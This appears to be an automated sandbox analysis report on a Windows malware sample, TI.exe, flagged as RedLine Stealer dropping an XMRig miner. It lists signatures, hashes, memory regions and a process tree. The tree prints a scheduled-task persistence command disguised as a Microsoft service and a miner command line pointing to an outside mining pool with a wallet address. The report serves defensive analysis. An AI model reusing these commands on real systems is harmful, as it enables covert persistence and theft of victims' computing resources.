Analysis

  • max time kernel
    43s
  • max time network
    115s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    23-02-2021 09:57

General

  • Target

    TI.exe

  • Size

    2.5MB

  • MD5

    a5d3fdf55abb54ec0b632dee9d3459d4

  • SHA1

    c177421eb77f0d341e5d1bd6cfbccb60e0c86a1c

  • SHA256

    677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f

  • SHA512

    4faafc484d66545a3355ba4d76da6dd021b556a06ec5b15fa8b4b8a4f1161b44ffad5e654991cf658fc6bd49b458e59586155dfdf339e1150b278ff5b9a41324

Malware Config

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • themida 11 IoCs

    Detects Themida, Advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\TI.exe
    "C:\Users\Admin\AppData\Local\Temp\TI.exe"
    1⤵
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Users\Admin\AppData\Local\4q23ttwg.exe
      "C:\Users\Admin\AppData\Local\4q23ttwg.exe"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:620
    • C:\Users\Admin\AppData\Local\1pbrc0xw.exe
      "C:\Users\Admin\AppData\Local\1pbrc0xw.exe"
      2⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Loads dropped DLL
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1016
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Windows Service © Microsoft Corporation" /tr "C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe" /f
        3⤵
        • Creates scheduled task(s)
        PID:760
      • C:\Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe
        "C:\Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe" -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:632
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {CB74EA49-E2CB-4D8F-BEDE-C81CA726F63F} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]
    1⤵
      PID:1312
      • C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe
        C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe
        2⤵
          PID:912

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\1pbrc0xw.exe

        MD5

        f0ecefed65b00699cc2b57bf81492f56

        SHA1

        4e0fbc13af6c373c9944a53a40965517b619c274

        SHA256

        83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

        SHA512

        83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

      • C:\Users\Admin\AppData\Local\1pbrc0xw.exe

        MD5

        f0ecefed65b00699cc2b57bf81492f56

        SHA1

        4e0fbc13af6c373c9944a53a40965517b619c274

        SHA256

        83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

        SHA512

        83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

      • C:\Users\Admin\AppData\Local\4q23ttwg.exe

        MD5

        70dca411445d3b4394d9c467bf3ff994

        SHA1

        83f9120b2b184eb991d1dcbf4bb13d5f2f4a6097

        SHA256

        1d1f06c0d0965296755770b3f6a70a90e0d21a57ef5e47f9a26fcc4008ad45ef

        SHA512

        4a2f84a8fb4bb0eba8402eb417cadb8bcef6ac309ee4918a698cab756ea888ff076545e1ed02f85f5705fe15f7eb7ec01b68c3bc98f74b4e13f5b8e4f0184cd6

      • C:\Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe

        MD5

        e95f766a3748042efbf0f05d823f82b7

        SHA1

        fa4a29f9b95f4491e07eba54a677d52d8d061a19

        SHA256

        1aef2fba4058ad80e4ae16dce0d2609e9f946ba9a4f2203891a26a92b3f6578c

        SHA512

        e4d61199b57ae189c2bef7adc661224cfb00e9d6b3526c07624911238aad2d81d9548b52db1c6dbbf4a0e3f766d57080d2414ca836e037f0bb39728d1f1af55c

      • C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe

        MD5

        f0ecefed65b00699cc2b57bf81492f56

        SHA1

        4e0fbc13af6c373c9944a53a40965517b619c274

        SHA256

        83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

        SHA512

        83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

      • C:\Users\Admin\AppData\Roaming\Windows\RantimeBroker.exe

        MD5

        f0ecefed65b00699cc2b57bf81492f56

        SHA1

        4e0fbc13af6c373c9944a53a40965517b619c274

        SHA256

        83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

        SHA512

        83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

      • \Users\Admin\AppData\Local\1pbrc0xw.exe

        MD5

        f0ecefed65b00699cc2b57bf81492f56

        SHA1

        4e0fbc13af6c373c9944a53a40965517b619c274

        SHA256

        83f953427624eaba72e6d34339b4004c3614657bfe9fb601eca7e76410b71325

        SHA512

        83bfdd06bf7e3497d6d0ec1686ede07d11003057919cdb74b3224e1deeb6dfa9259a83344c419ca0b2dec4cd42292c6047d842eeb09cf3459d6ac6c21130533f

      • \Users\Admin\AppData\Local\4q23ttwg.exe

        MD5

        70dca411445d3b4394d9c467bf3ff994

        SHA1

        83f9120b2b184eb991d1dcbf4bb13d5f2f4a6097

        SHA256

        1d1f06c0d0965296755770b3f6a70a90e0d21a57ef5e47f9a26fcc4008ad45ef

        SHA512

        4a2f84a8fb4bb0eba8402eb417cadb8bcef6ac309ee4918a698cab756ea888ff076545e1ed02f85f5705fe15f7eb7ec01b68c3bc98f74b4e13f5b8e4f0184cd6

      • \Users\Admin\AppData\Roaming\Windows\CPU\cpu.exe

        MD5

        e95f766a3748042efbf0f05d823f82b7

        SHA1

        fa4a29f9b95f4491e07eba54a677d52d8d061a19

        SHA256

        1aef2fba4058ad80e4ae16dce0d2609e9f946ba9a4f2203891a26a92b3f6578c

        SHA512

        e4d61199b57ae189c2bef7adc661224cfb00e9d6b3526c07624911238aad2d81d9548b52db1c6dbbf4a0e3f766d57080d2414ca836e037f0bb39728d1f1af55c

      • memory/620-22-0x00000000055C0000-0x00000000055C1000-memory.dmp

        Filesize

        4KB

      • memory/620-13-0x0000000073E00000-0x00000000744EE000-memory.dmp

        Filesize

        6.9MB

      • memory/620-14-0x00000000008D0000-0x00000000008D1000-memory.dmp

        Filesize

        4KB

      • memory/620-9-0x0000000000000000-mapping.dmp

      • memory/632-29-0x0000000000000000-mapping.dmp

      • memory/632-34-0x00000000002B0000-0x00000000002D0000-memory.dmp

        Filesize

        128KB

      • memory/632-33-0x0000000000270000-0x0000000000290000-memory.dmp

        Filesize

        128KB

      • memory/632-32-0x000000013F320000-0x00000001404D8000-memory.dmp

        Filesize

        17.7MB

      • memory/632-31-0x00000000000F0000-0x0000000000104000-memory.dmp

        Filesize

        80KB

      • memory/760-26-0x0000000000000000-mapping.dmp

      • memory/912-36-0x0000000000000000-mapping.dmp

      • memory/912-40-0x0000000073E00000-0x00000000744EE000-memory.dmp

        Filesize

        6.9MB

      • memory/912-41-0x00000000002F0000-0x00000000002F1000-memory.dmp

        Filesize

        4KB

      • memory/912-43-0x00000000055B0000-0x00000000055B1000-memory.dmp

        Filesize

        4KB

      • memory/1016-27-0x0000000005370000-0x0000000005371000-memory.dmp

        Filesize

        4KB

      • memory/1016-23-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

        Filesize

        4KB

      • memory/1016-21-0x0000000073E00000-0x00000000744EE000-memory.dmp

        Filesize

        6.9MB

      • memory/1016-17-0x0000000000000000-mapping.dmp

      • memory/1784-7-0x00000000055B0000-0x00000000055B1000-memory.dmp

        Filesize

        4KB

      • memory/1784-2-0x00000000760D1000-0x00000000760D3000-memory.dmp

        Filesize

        8KB

      • memory/1784-5-0x0000000000B40000-0x0000000000B41000-memory.dmp

        Filesize

        4KB

      • memory/1784-4-0x0000000073E00000-0x00000000744EE000-memory.dmp

        Filesize

        6.9MB